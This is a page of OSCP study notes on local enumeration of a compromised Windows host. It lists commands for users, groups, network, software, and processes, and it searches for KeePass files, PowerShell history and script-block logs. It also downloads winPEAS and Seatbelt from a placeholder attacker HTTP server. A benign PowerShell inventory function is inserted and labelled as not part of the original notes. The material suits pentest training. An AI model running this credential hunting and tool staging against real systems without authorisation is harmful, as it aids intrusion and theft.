๐Ÿฒ
OSCP Notes
  • ๐ŸฒOSCP Notes
  • ๐ŸฒOSCP Methodology
  • ๐Ÿ’กMisc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • ๐Ÿง Mindmap
    • ๐ŸฅMimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • Automated Enumeration
  • References
  1. Windows
  2. Enumeration

Local Enumeration

Username and hostname.

whoami
hostname

Group memberships of the current user.

whoami /groups

Existing users and groups.

Get-LocalUser
Get-LocalUser <user_name>
Get-LocalGroup
Get-LocalGroupMember <group_name>
net user
net user <user_name>
net localgroup
net localgroup <group_name>

Operating system, version and architecture.

systeminfo

Network information.

ipconfig /all
route print
netstat -ano

Installed applications, read from the 64-bit Uninstall key and from the Wow6432Node key that lists 32-bit applications on 64-bit Windows.

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
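As an added example that is not part of the original notes, the following PowerShell function combines the two registry queries above (plus the per-user HKCU hive) into one inventory that also records version, publisher and install path; the function and parameter names are my own.

```powershell
# Added example, not from the original notes: merges the 64-bit (HKLM), 32-bit
# (Wow6432Node) and per-user (HKCU) Uninstall hives into one inventory and keeps
# version, publisher and install path, which 'select displayname' drops.
function Get-InstalledSoftware {
    [CmdletBinding()]
    param(
        # Optional wildcard filter on the display name, e.g. '*xampp*'.
        [string]$Name = '*'
    )

    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    )

    $results = foreach ($key in $uninstallKeys) {
        # A missing hive (e.g. Wow6432Node on 32-bit Windows) is skipped, not an error.
        Get-ItemProperty -Path $key -ErrorAction SilentlyContinue |
            # Entries without a DisplayName are update packages or leftovers, not applications.
            Where-Object { $_.DisplayName -and $_.DisplayName -like $Name } |
            ForEach-Object {
                [PSCustomObject]@{
                    Name            = $_.DisplayName
                    Version         = $_.DisplayVersion
                    Publisher       = $_.Publisher
                    InstallLocation = $_.InstallLocation
                    # Wow6432Node in the key path marks a 32-bit application on 64-bit Windows.
                    Architecture    = if ($_.PSPath -like '*Wow6432Node*') { 'x86' } else { 'x64' }
                    # HKCU entries are installed for the current user only.
                    Scope           = if ($_.PSPath -like '*HKEY_CURRENT_USER*') { 'User' } else { 'Machine' }
                }
            }
    }

    $results | Sort-Object Name, Version -Unique
}

# Usage: full inventory, then only 32-bit applications with a known install directory.
Get-InstalledSoftware | Format-Table -AutoSize
Get-InstalledSoftware | Where-Object { $_.Architecture -eq 'x86' -and $_.InstallLocation } |
    Format-Table Name, Version, InstallLocation -AutoSize
```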

Running processes.

Get-Process
Get-Process <process_name> | select Path

Search for files of interest, e.g. KeePass databases (.kdbx), configuration and text files.

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.bin,*.txt -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users -Include *.txt -File -Force -Recurse -ErrorAction SilentlyContinue

PowerShell history: the commands of the current session, and the path of the persistent PSReadLine history file.

Get-History # Get History Commands

(Get-PSReadlineOption).HistorySavePath # Get History File Path

PowerShell script block logging events (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), filtered for a string of interest ("dave" in the example below).

Get-WinEvent Microsoft-Windows-PowerShell/Operational | Where-Object Id -eq 4104 | ForEach-Object { $_.Message } | findstr "dave*"

Automated Enumeration

Download and execute winPEAS and Seatbelt.

iwr -uri http://<attacker_http_server>/winPEASx64.exe -Outfile winPEAS.exe
iwr -uri http://<attacker_http_server>/Seatbelt.exe -Outfile Seatbelt.exe
.\Seatbelt.exe -group=all

References

  • winPEAS: PEASS-ng/winPEAS at master · peass-ng/PEASS-ng (GitHub)
  • Seatbelt: GhostPack/Seatbelt, a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives (GitHub)

Last updated 7 months ago